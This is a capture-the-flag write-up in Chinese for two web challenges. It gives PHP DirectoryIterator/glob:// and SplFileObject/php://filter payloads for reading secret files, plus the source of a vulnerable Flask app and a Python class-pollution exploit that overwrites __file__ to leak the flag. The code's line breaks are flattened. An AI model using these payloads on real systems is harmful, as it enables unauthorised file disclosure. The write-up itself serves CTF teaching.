[Week4] flag直接读取不就行了?
?K=DirectoryIterator&W=glob:///secret/*
J=SplFileObject&H=php://filter/read=convert.base64-encode/resource=/secret/f11444g.php
[Week4] 圣钥之战1.0
进入后可以发现题目说去read找flag
所以访问发现得到源码
from flask import Flask,request
import jsonapp = Flask(__name__)def merge(src, dst):for k, v in src.items():if hasattr(dst, '__getitem__'):if dst.get(k) and type(v) == dict:merge(v, dst.get(k))else:dst[k] = velif hasattr(dst, k) and type(v) == dict:merge(v, getattr(dst, k))else:setattr(dst, k, v)def is_json(data):try:json.loads(data)return Trueexcept ValueError:return Falseclass cls():def __init__(self):passinstance = cls()@app.route('/', methods=['GET', 'POST'])
def hello_world():return open('/static/index.html', encoding="utf-8").read()@app.route('/read', methods=['GET', 'POST'])
def Read():file = open(__file__, encoding="utf-8").read()return f"J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag(乐){file}"@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():if request.is_json:merge(json.loads(request.data),instance)else:return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"if __name__ == '__main__':app.run(host='0.0.0.0',port=80)是一道原型链污染(其实从题目提示的污染就可以猜到了)
根据代码我们可以知道是需要发送JSON数据到/pollute,merge函数会尝试将这个 JSON 数据合并到instance对象中,再根据/read目录里的file = open(__file__, encoding="utf-8").read(),可以猜测有可能利用__file__属性打开flag文件查看。
exp:
import requests
import jsonurl = "http://challenge.basectf.fun:23859/pollute"data = {"__class__":{"__init__":{"__globals__":{"__file__":"/../../flag"}}}
}# 将字典转换为JSON格式的字符串
json_data = json.dumps(data)# 发送POST请求
response = requests.post(url, data=json_data,headers={'Content-Type': 'application/json'})print(response.text) //J1ngHong说:圣钥暗淡了一点,你居然污染成功了?此时再返回题目访问/read即可得到flag
